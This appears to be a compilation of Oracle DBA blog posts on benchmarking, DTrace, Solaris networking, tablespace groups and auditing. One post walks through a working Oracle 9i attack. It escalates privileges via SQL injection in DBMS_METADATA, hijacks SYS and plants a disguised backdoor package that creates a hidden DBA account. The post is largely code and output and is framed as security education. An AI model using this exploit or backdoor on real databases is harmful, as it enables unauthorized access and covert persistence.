Choose the option to create the Calling Circle schema. On the next screen, enter the connection details of the database you will be creating the schema in. This involves entering the host name, the port number (if not using the default listener port of 1521) and the database service name. Also, ensure that you choose the type IV Thin JDBC driver. Click [Next] when you have entered this information.

The next screen involves the schema details for the Calling Circle schema. Enter appropriate locations for the datafiles on your system. When finished entering information on this screen, click [Next] to continue. This will bring you to the Schema Sizing window as shown below:



Use the slider to select the schema size you wish to use. For this post, I chose a schema size with 2,023,019 customers, which implies a 2.1 GB tablespace for data and a 1.3 GB tablespace for indexes. When finished choosing your schema size, click [Next] to continue, then click [Finish] on the next screen to complete the wizard and create the schema. A progress bar will appear as shown below:



Creating the Input Data for Calling Circle

Before each run of the Calling Circle application, it is necessary to create the input data for the benchmark. This is accomplished using the same ccwizard program we used for creating the Calling Circle schema. Start ccwizard again and click [Next] on the welcome screen. On the "Select Task" screen shown previously, this time select "Generate Data for Benchmark Run" and click [Next].

In the "Schema Details" window which follows, enter the details of the schema which you created in the last section. Click [Next] once all the necessary information has been entered. You will then be presented with the "Benchmark Details" screen as shown below:



In this post, we will use 1000 transactions for each test, as seen in the "Number of Transactions" field above. Press [Next] to continue and you will be presented with the final screen. Click [Finish] to create the benchmark data.

Starting the Benchmark Test

Now that we have the Calling Circle schema created and the input data generated, we can start our tests. To start Swingbench with the Calling Circle benchmark, we pass the sample Calling Circle configuration file (ccconfig.xml) supplied with Swingbench as a runtime parameter, like so:


$ ./swingbench -c sample/ccconfig.xml


This will start Swingbench with the sample configuration for the Calling Circle application; only a few settings need to be changed for us to use this configuration. All that needs to change is the connection settings for the host on which you have already set up the Calling Circle schema. Change the connection settings as necessary for your environment.

The following screenshot shows the Calling Circle application running in Swingbench:



We will be performing 1000 transactions during each test run as specified when we generated the sample data. The Swingbench configuration we will be using for every test we perform is as follows:



This workload is typical of an OLTP application with 40% reads and 60% writes. The number of users associated with the workload is 15. We will use this exact workload for every test we perform.

Results & Conclusion

The measurements from Swingbench which we will use for comparing the performance of a UFS file system when Oracle uses direct I/O versus buffered I/O are the following:

  • Transaction throughput (number of transactions per minute)
  • Average response time for each transaction type
We will perform 5 runs of the benchmark for each configuration we want to compare and then present the average of the measurements below. So we will run the tests 5 times with buffered I/O and then 5 times with un-buffered I/O enabled by setting the FILESYSTEMIO_OPTIONS parameter.

So the comparisons from these 2 measurements are as follows:



While these tests were not very conclusive or thorough, they do show how Swingbench can be used to generate database activity. The measurements I compared are only some of the measurements Swingbench reports when a benchmark finishes. Hopefully I will be able to play with, and post a bit more about, the excellent Swingbench utility in the future.

Observing Oracle I/O Access Patterns with DTrace

In this post, I will use the seeks.d and iopattern DTrace scripts, which are available as part of the DTraceToolkit (an extremely useful collection of scripts created by Brendan Gregg), to view the I/O access patterns typical of Oracle. DTrace is able to capture data throughout the kernel, so the job of finding access patterns is greatly simplified.

The system on which these examples are run has the redo logs on one disk, the datafiles on another, and the control file on a third.

To get system-wide access patterns, the iopattern script can be used. Sample output is as follows:


# ./iopattern
%RAN %SEQ COUNT MIN MAX AVG KR KW
100 0 7 4096 8192 7606 4 48
0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0
100 0 6 8192 8192 8192 0 48
0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0
100 0 6 8192 8192 8192 0 48
0 0 0 0 0 0 0 0
0 0 0 0 0 0 0 0
100 0 6 8192 8192 8192 0 48
0 0 0 0 0 0 0 0


This output was generated on an idle system (0.04 load average). You can see that the iopattern script provides the percentage of random and sequential I/O on the system; during this monitoring period, while the system was idle, all the I/O was random. The script also provides the number and total size of the I/O operations performed during the sample period, along with the minimum, maximum, and average I/O sizes.

Now, look at the output generated from the iopattern script during a period of heavy database load:


# ./iopattern
%RAN %SEQ COUNT MIN MAX AVG KR KW
92 8 69 4096 8192 6589 304 140
86 14 69 4096 8192 5995 228 176
82 18 67 4096 8192 5257 64 280
84 16 19 4096 8192 6036 40 72
77 23 22 4096 8192 4282 0 92
88 12 68 4096 1015808 21744 1120 324
97 3 67 4096 8192 7274 400 76
89 11 66 4096 8192 6392 276 136
90 10 71 4096 8192 6345 216 224
87 13 62 4096 8192 5879 184 172
90 10 10 4096 8192 6553 40 24
100 0 17 8192 8192 8192 88 48
87 13 33 4096 1048576 38353 1168 68
86 14 65 4096 8192 6049 236 148


As you can see from the output above, the majority of the I/O which occurs during this period is random. To my mind, this is one indication that the type of I/O typical of an OLTP environment is random (as we would expect).

To get the I/O distribution for each disk, the seeks.d script can be used. This script measures the seek distance for disk events and generates a distribution plot. It is based on the seeksize.d script provided with the DTraceToolkit and is available in the Solaris Internals volumes.

Sample output from the seeks.d script is shown below:


# ./seeks.d
Tracing... Hit Ctrl-C to end.
^C

cmdk0
value ------------- Distribution ------------- count
-1 | 0
0 |@@@@@@@@@@@@@@@@@@@@@ 43
1 | 0
2 | 0
4 | 0
8 | 0
16 | 0
32 | 0
64 | 0
128 |@@@@@@@@@@@@@ 26
256 |@@@@@@ 12
512 | 0

sd1
value ------------- Distribution ------------- count
32768 | 0
65536 |@@@@@@@@@@@@@@@@@@@@ 1
131072 | 0
262144 | 0
524288 | 0
1048576 |@@@@@@@@@@@@@@@@@@@@ 1
2097152 | 0


This output was generated when the system was idle, as before, and summarizes the seeks performed by each disk on the system. The sd1 disk in the output above is the disk on which my Oracle datafiles reside. The value column indicates the size in bytes of the seek that was performed; the fairly large seek lengths indicate some random I/O on this disk. The disk on which the redo logs are located (sd2) does not show up in the output above since no I/O is being generated on that disk.

Now, it is interesting to look at the output generated from the seeks.d script during a period when the database is under a heavy load.


# ./seeks.d
Tracing... Hit Ctrl-C to end.
^C

cmdk0
value ------------- Distribution ------------- count
-1 | 0
0 |@@@@@@@@@@@@@@@@@@@@@@@ 18
1 | 0
2 | 0
4 | 0
8 | 0
16 | 0
32 | 0
64 | 0
128 |@@@@@@@@@@@@@ 10
256 |@@@@@ 4
512 | 0

sd2
value ------------- Distribution ------------- count
-1 | 0
0 |@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@ 430
1 | 0
2 | 0
4 | 0
8 |@@@@@@@@ 120
16 |@ 11
32 | 3
64 | 0
128 | 0
256 | 0
512 | 0
1024 | 0
2048 | 0
4096 | 0
8192 | 0
16384 | 0
32768 | 0
65536 | 6
131072 | 0

sd1
value ------------- Distribution ------------- count
512 | 0
1024 |@@@ 31
2048 | 5
4096 | 0
8192 | 0
16384 | 0
32768 | 0
65536 |@@ 23
131072 |@@@@@@@@ 92
262144 |@@@@@@@ 73
524288 |@ 6
1048576 | 4
2097152 |@ 14
4194304 |@@@ 29
8388608 |@@@@ 40
16777216 |@@@@@ 56
33554432 |@@@@@@ 65
67108864 | 0


This time, the disk on which the redo logs are located shows up as there is activity occurring on it. You can see that most of this activity is sequential, as most of the events incurred a zero-length seek. This makes sense, as the log writer background process (LGWR) writes the redo log files in a sequential manner. However, you can see that I/O on the disk which contains the Oracle datafiles is random, as seen by the widely distributed seek lengths (up to the 33554432 to 67108864 bucket).

This post did not really contain any new information, but I thought it would be cool to show a tiny bit of what DTrace makes possible. It is one of the coolest tools I have used in the last year and one of the many reasons why I have become a huge Solaris fan!

Installing & Configuring a USB NIC on Solaris

In this post, I will provide a very quick overview of how to install and configure a USB network interface on Solaris.

Obtaining the USB Driver

The driver for a generic USB network interface which should cover the majority of USB NIC devices can be downloaded from here.

Installing the USB Driver

After downloading the driver, uncompress the gzipped file and extract the archive as the root user.

# gunzip upf-0.8.0.tar.gz ; tar xvf upf-0.8.0.tar

This will create a upf-0.8.0 directory in the current directory. Change to the upf-0.8.0 directory. Now we need to perform the following to install the driver:

# make install
# ./adddrv.sh


After this has completed, the driver is installed, but the system needs to be rebooted before we can use it. Reboot the system using the following procedure:

# touch /reconfigure
# shutdown -i 0 -g0 y


This will scan for new hardware on reboot. The new NIC device will show up as /dev/upf0.

Configuring the NIC Device

Once the USB driver has been installed and the system has been rebooted, the NIC device can be configured as follows (in this example, we will just make up an IP address to use):

# ifconfig upf0 plumb
# ifconfig upf0 192.168.2.111 netmask 255.255.255.0 up


Making Sure the NIC Device Starts on Boot

To ensure that the new NIC device starts automatically on boot, we need to create an /etc/hostname.<interface> file for that interface containing either the IP address configured for the interface or, if we placed the IP address in the /etc/inet/hosts file, the hostname for that interface.
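
For the upf0 interface configured above, that boils down to a one-liner (using the made-up IP address from the previous step):

# echo "192.168.2.111" > /etc/hostname.upf0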

Generating a System State Dump on HP-UX with gdb

I have previously used gdb (the GNU Debugger) to generate Oracle system state dumps on Linux systems by attaching to an Oracle process. The ability to do this is well documented by Oracle on Metalink (Note 121779.1) and in other locations.
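
Roughly, the Linux procedure looks like the following; the internal function name ksudss and the dump level are as I remember them from the note, so treat this as a sketch rather than a reference:

$ gdb $ORACLE_HOME/bin/oracle <pid-of-server-process>
(gdb) print ksudss(10)
(gdb) detach
(gdb) quit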

The problem is that this does not work on the HP-UX platform, which I found out at the wrong time: while trying to generate a system state dump during a database hang!

Apparently, the Oracle executable needs to be re-linked on the HP-UX platform to enable the gdb debugger to generate system state dumps by attaching to an Oracle process.

You can see all the gory details in Metalink Note 273324.1. I posted it here as I thought it might prove useful for me to have this information somewhere should I forget it in the future...

Temporary Tablespace Groups

Temporary tablespace groups are a new feature introduced in Oracle 10g. A temporary tablespace group is a list of tablespaces; it is implicitly created when the first temporary tablespace is assigned to it, and its members can only be temporary tablespaces.

You can specify a tablespace group name wherever a tablespace name would appear when you assign a default temporary tablespace for the database or a temporary tablespace for a user. Using a tablespace group, rather than a single temporary tablespace, can alleviate problems caused when one tablespace is inadequate to hold the results of a sort, particularly on a table that has many partitions. A tablespace group also enables parallel execution servers in a single parallel operation to use multiple temporary tablespaces.

Group Creation

You do not explicitly create a tablespace group. Rather, it is created implicitly when you assign the first temporary tablespace to the group. The group is deleted when the last temporary tablespace it contains is removed from it.

SQL> CREATE TEMPORARY TABLESPACE temp_test_1
2 TEMPFILE '/oracle/oracle/oradata/orclpad/temp_test_1.tmp'
3 SIZE 100 M
4 TABLESPACE GROUP temp_group_1;

Tablespace created.

SQL>


If the group temp_group_1 did not already exist, it would be created at this time. Now we will create a temporary tablespace but will not add it to the group.

SQL> CREATE TEMPORARY TABLESPACE temp_test_2
2 TEMPFILE '/oracle/oracle/oradata/orclpad/temp_test_2.tmp'
3 SIZE 100 M
4 TABLESPACE GROUP '';

Tablespace created.

SQL>


Now we will alter this tablespace and add it to a group.

SQL> ALTER TABLESPACE temp_test_2
2 TABLESPACE GROUP temp_group_1;

Tablespace altered.

SQL>


To de-assign a temporary tablespace from a group, we issue an ALTER TABLESPACE command as so:

SQL> ALTER TABLESPACE temp_test_2
2 TABLESPACE GROUP '';

Tablespace altered.

SQL>


Assign Users to Temporary Tablespace Groups

In this example, we will assign the user SCOTT to the temporary tablespace group temp_group_1.

SQL> ALTER USER scott
2 TEMPORARY TABLESPACE temp_group_1;

User altered.

SQL>


Now when we query the DBA_USERS view to see SCOTT's default temporary tablespace, we can see that the group is now his temporary tablespace.

SQL> SELECT username, temporary_tablespace
2 FROM DBA_USERS
3 WHERE username = 'SCOTT';

USERNAME TEMPORARY_TABLESPACE
-------- ------------------------------
SCOTT TEMP_GROUP_1

SQL>


Data Dictionary Views

To view a temporary tablespace group and its members, we can query the DBA_TABLESPACE_GROUPS data dictionary view.

SQL> SELECT * FROM DBA_TABLESPACE_GROUPS;

GROUP_NAME TABLESPACE_NAME
------------ ------------------------------
TEMP_GROUP_1 TEMP_TEST_1
TEMP_GROUP_1 TEMP_TEST_2

SQL>


Advantages of Temporary Tablespace Groups

  • Allows multiple default temporary tablespaces
  • A single SQL operation can use multiple temporary tablespaces for sorting
  • Rather than have all temporary I/O go against a single temporary tablespace, the database can distribute that I/O load among all the temporary tablespaces in the group.
  • If you perform an operation in parallel, child sessions in that parallel operation are able to use multiple tablespaces.

Installing a Back Door in Oracle 9i

In this post, we will demonstrate a way an attacker could install a back door in a 9i Oracle database. The information in this post is based on information obtained from Pete Finnigan's website and 2600 magazine. The version of the database we are using in this post is:

sys@ORA9R2> select * from v$version;
BANNER
----------------------------------------------------------------
Oracle9i Enterprise Edition Release 9.2.0.4.0
PL/SQL Release 9.2.0.4.0 - Production
CORE 9.2.0.3.0 Production
TNS for Linux: Version 9.2.0.4.0 - Production
NLSRTL Version 9.2.0.4.0 - Production


Creating the User

In this example, we will create the user that we will install the back door with. We will presume that either an attacker has already gained access to this account or that a legitimate user wishes to install a back door in our database (the so-called insider threat). The user we will install the back door as is testUser. We will only grant CONNECT and RESOURCE to this user.

sys@ORA9R2> create user testUser identified by testUser;

User created.

sys@ORA9R2> grant connect, resource to testUser;

Grant succeeded.

sys@ORA9R2> connect testUser/testUser
Connected.
testuser@ORA9R2> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT NO YES NO
TESTUSER RESOURCE NO YES NO

testuser@ORA9R2>


Gaining DBA Privileges

Now we will use a known exploit in the 9i version of Oracle that will allow this user to obtain the DBA role. This exploit is described in the document 'Many Ways to Become DBA' by Pete Finnigan, and it involves creating a function and then exploiting a known vulnerability in the DBMS_METADATA package.

testuser@ORA9R2> create or replace function testuser.hack return varchar2
2 authid current_user is
3 pragma autonomous_transaction;
4 begin
5 execute immediate 'grant dba to testUser';
6 return '';
7 end;
8 /

Function created.

testuser@ORA9R2> select sys.dbms_metadata.get_ddl('''||testuser.hack()||''','')
2 from dual;
ERROR:
ORA-31600: invalid input value '||testuser.hack()||' for parameter OBJECT_TYPE in
function GET_DDL
ORA-06512: at "SYS.DBMS_SYS_ERROR", line 105
ORA-06512: at "SYS.DBMS_METADATA_INT", line 1536
ORA-06512: at "SYS.DBMS_METADATA_INT", line 1900
ORA-06512: at "SYS.DBMS_METADATA_INT", line 3606
ORA-06512: at "SYS.DBMS_METADATA", line 504
ORA-06512: at "SYS.DBMS_METADATA", line 560
ORA-06512: at "SYS.DBMS_METADATA", line 1221
ORA-06512: at line 1

no rows selected

testuser@ORA9R2> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT NO YES NO
TESTUSER DBA NO YES NO
TESTUSER RESOURCE NO YES NO

testuser@ORA9R2>


As you can see from the output above, the attacker has now gained the DBA role. Now, the attacker can start working on installing the back door.

Creating and Installing the Back Door

Now, he/she saves the encrypted form of the SYS user's password before installing the back door.

testuser@ORA9R2> select username, password
2 from dba_users
3 where username = 'SYS';

USERNAME PASSWORD
-------- ------------------------------
SYS 43CA255A7916ECFE

testuser@ORA9R2>


Now, the attacker wants to install the back door as the SYS user, so he/she alters the password of the SYS user in order to connect as SYS. The attacker will change this password back to the saved value once the back door has been installed.

testuser@ORA9R2> alter user sys identified by pass;
User altered.
testuser@ORA9R2> connect sys/pass as sysdba
Connected.
testuser@ORA9R2>


Now the attacker is connected as the SYS user and starts creating the back door, like so:

testuser@ORA9R2> CREATE OR REPLACE PACKAGE dbms_xml AS
2 PROCEDURE parse (string IN VARCHAR2);
3 END dbms_xml;
4 /
Package created.
testuser@ORA9R2>
CREATE OR REPLACE PACKAGE BODY dbms_xml AS
   PROCEDURE parse (string IN VARCHAR2) IS
      var1 VARCHAR2 (100);
   BEGIN
      IF string = 'unlock' THEN
         SELECT PASSWORD INTO var1 FROM dba_users WHERE username = 'SYS';
         EXECUTE IMMEDIATE 'create table syspa1 (col1 varchar2(100))';
         EXECUTE IMMEDIATE 'insert into syspa1 values ('''||var1||''')';
         COMMIT;
         EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY padraig';
      END IF;
      IF string = 'lock' THEN
         EXECUTE IMMEDIATE 'SELECT col1 FROM syspa1 WHERE ROWNUM=1' INTO var1;
         EXECUTE IMMEDIATE 'ALTER USER SYS IDENTIFIED BY VALUES '''||var1||'''';
         EXECUTE IMMEDIATE 'DROP TABLE syspa1';
      END IF;
      IF string = 'make' THEN
         EXECUTE IMMEDIATE 'CREATE USER hill IDENTIFIED BY padraig';
         EXECUTE IMMEDIATE 'GRANT DBA TO hill';
      END IF;
      IF string = 'unmake' THEN
         EXECUTE IMMEDIATE 'DROP USER hill CASCADE';
      END IF;
   END;
END dbms_xml;
/

testuser@ORA9R2> CREATE PUBLIC SYNONYM dbms_xml FOR dbms_xml;

Synonym created.

testuser@ORA9R2> GRANT EXECUTE ON dbms_xml TO PUBLIC;

Grant succeeded.

testuser@ORA9R2>


This package does the following (examples will be shown below):

  • It can unlock the SYS account by changing the password to a known password (in this case 'padraig').
  • Then, it can revert the SYS account's password back to the original password.
  • It can create a new user account with a known password that has the DBA role which can later be dropped from the database.
The attacker has now created a back door that can be very difficult to discover, having chosen a name for the package that makes it look like it was installed with the Oracle database. Now, the attacker changes the SYS user's password back to its original value to prevent the DBA from noticing that the SYS account has been hijacked. The attacker also revokes the DBA role from his/her user account to prevent detection; this role is no longer needed now that the back door is installed.

testuser@ORA9R2> alter user sys identified by values '43CA255A7916ECFE';

User altered.

testuser@ORA9R2> revoke dba from testUser;

Revoke succeeded.

testuser@ORA9R2> disconnect
Disconnected from Oracle9i Enterprise Edition Release 9.2.0.4.0 - Production
With the Partitioning, OLAP and Oracle Data Mining options
JServer Release 9.2.0.4.0 - Production
testuser@ORA9R2> connect testUser/testUser
Connected.
testuser@ORA9R2> select * from user_role_privs;

USERNAME GRANTED_ROLE ADM DEF OS_
-------- ------------ --- --- ---
TESTUSER CONNECT NO YES NO
TESTUSER RESOURCE NO YES NO

In this first example, the attacker is going to use his/her back door to unlock the SYS account and connect as the SYS user.

testuser@ORA9R2> execute dbms_xml.parse('unlock');

PL/SQL procedure successfully completed.

testuser@ORA9R2> connect sys/padraig as sysdba
Connected.
testuser@ORA9R2> show user
USER is "SYS"
testuser@ORA9R2>


Now, the attacker has finished doing his/her work as the SYS user and changes the SYS password back to the original by calling the back door again:

testuser@ORA9R2> execute dbms_xml.parse('lock');

PL/SQL procedure successfully completed.

testuser@ORA9R2>


Conclusion

This post showed how an attacker could exploit a known vulnerability in Oracle 9i to obtain DBA privileges and install a back door in an Oracle database. Of course, a wary DBA could detect this by auditing the ALTER USER statement and checking SYS-owned objects periodically.
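
For instance, auditing of that statement can be switched on with a one-liner from a shell (assuming auditing is already enabled via the AUDIT_TRAIL parameter):

$ sqlplus -s "/ as sysdba" <<EOF
AUDIT ALTER USER;
EOF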

OCFS2 Mount by Label Support

While messing around with OCFS2 on my RHEL4 install, I discovered that if I created an OCFS2 filesystem with a label, I was unable to mount it by that label. I would encounter the following:

# mount -L "oradata" /ocfs2
mount: no such partition found
#

I found this quite strange and did some investigation. The version of util-linux present on my system after a fresh RHEL 4 install was util-linux-2.12a-16.EL4.6.

After doing some research online, I discovered that the latest versions of util-linux include a patch from Oracle for mounting an OCFS2 filesystem by label.

So I grabbed the latest version of util-linux from Red Hat and, voila, I am now able to mount an OCFS2 filesystem by its label.

The current version of util-linux on my system is - util-linux-2.12a-16.EL4.20.

White Paper at Oracle OpenWorld

A white paper that I helped write is being presented at Oracle OpenWorld this week. The paper is entitled 'High Availability Options for the Oracle Database'. It is being presented by Dan Norris; I wrote the sections on Export/Import and Data Pump. The paper is available for download from the IT Convergence website here.

Dan is kinda like my mentor here at IT Convergence. He has a lot of knowledge and experience with Oracle especially with RAC and is quite well known in the Oracle community.

At the moment, I've been working on setting up a cheap 10g RAC environment in the office for testing and educational purposes. The RAC is up and running now. I followed this excellent article by Jeffrey Hunter on setting up a RAC environment with a budget!

OCFS2 would not play nice for me though, so I decided to use raw devices instead of OCFS2, which Mr. Hunter used in his article. Besides that, I pretty much followed his article and was able to get my 10g RAC up and running (after a small bit of hassle with the Oracle FireWire modules!).

First Paper Accepted

I just found out that my first paper has been accepted! It's a pretty nice feeling. This paper was based on research I did in the summer of 2005 with the MISL research group in UCC.

A pre-print version of the paper is available here. It was accepted to a conference called the First International Workshop on Practical Issues in Building Sensor Network Applications.

Now I'm hoping my paper on small-world networks gets accepted to the AI conference I submitted it to. If I decide to apply for graduate school again this fall, these published papers will make my application a lot better.

It really feels like a sense of achievement when your paper gets accepted; it makes your work feel validated. I know that's a bit stupid because I should feel proud of my work anyway, but I have to admit it does make me feel a bit prouder of it now that it is worthy of presentation at a scientific conference.

Anyway, fingers crossed on my next paper!!

Auditing SYSDBA Users

I recently came across this feature, introduced in Oracle 9i, whereby all operations performed by a user connecting as SYSDBA are logged to an OS file. I'm sure most DBAs are familiar with this feature already, but I have only just been enlightened!!

To enable this feature, auditing must be enabled and the AUDIT_SYS_OPERATIONS parameter must be set to TRUE. For example:

sys@ORCLINS1> ALTER SYSTEM SET AUDIT_SYS_OPERATIONS = TRUE SCOPE=SPFILE;

FALSE is the default value for this parameter. As is pretty obvious from the statement above, the database must be restarted for the parameter to take effect.

All the audit records are then written to an operating system file. The location of this file is determined by the AUDIT_FILE_DEST parameter.

sys@ORCLINS1> show parameter AUDIT_FILE_DEST

NAME                 TYPE        VALUE
-------------------- ----------- ------------------------------------
audit_file_dest      string      /oracle/oracle/admin/orclpad/adump

sys@ORCLINS1>


An audit file will be created for each session started by a user logging in as SYSDBA, and its file name will contain the process ID of the server session that Oracle started for the user.

Most people are probably already familiar with this handy feature but I like to have it documented for myself somewhere so I put it here!